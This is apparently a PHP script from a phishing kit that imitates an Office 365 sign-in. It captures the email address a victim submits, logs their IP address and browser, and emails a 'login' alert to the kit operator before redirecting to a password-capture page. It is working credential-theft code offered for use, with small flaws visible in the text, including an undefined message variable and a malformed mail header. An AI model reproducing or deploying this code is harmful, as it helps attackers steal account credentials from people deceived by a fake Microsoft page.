<?php
session_start();
error_reporting(0);
# Adding Settings
include('function.php');
include('../config.php');
# User =../.. $_SERVER['HTTP_USER_AGENT'];
// Define commonly used environment details
$IP = $_SERVER['REMOTE_ADDR'];
$date = date('d/m/Y h:i:s a');
$os = $_SERVER['HTTP_USER_AGENT'];
##

// Store email in session for later use
$_SESSION['email'] = $_POST["email"];

// Message construction moved to password.php to send email and password together

# Send Mail

if ($settings['send_mail'] == "1"){
    $to = $settings['email'];
    $headers = "Content-type:text/plain;charset=UTF-8\r\n";
    $headers .= "From: Holaide <olaideadebowale241@may.com\r\n";
    $subject = "✦ OFFICE 365 LOGIN FROM ✦ {$IP} ✦";
    $msg = $msgtg;
    mail($to, $subject, $msg, $headers);
  }

header('Location: ./password1.php');
?>./Microsoft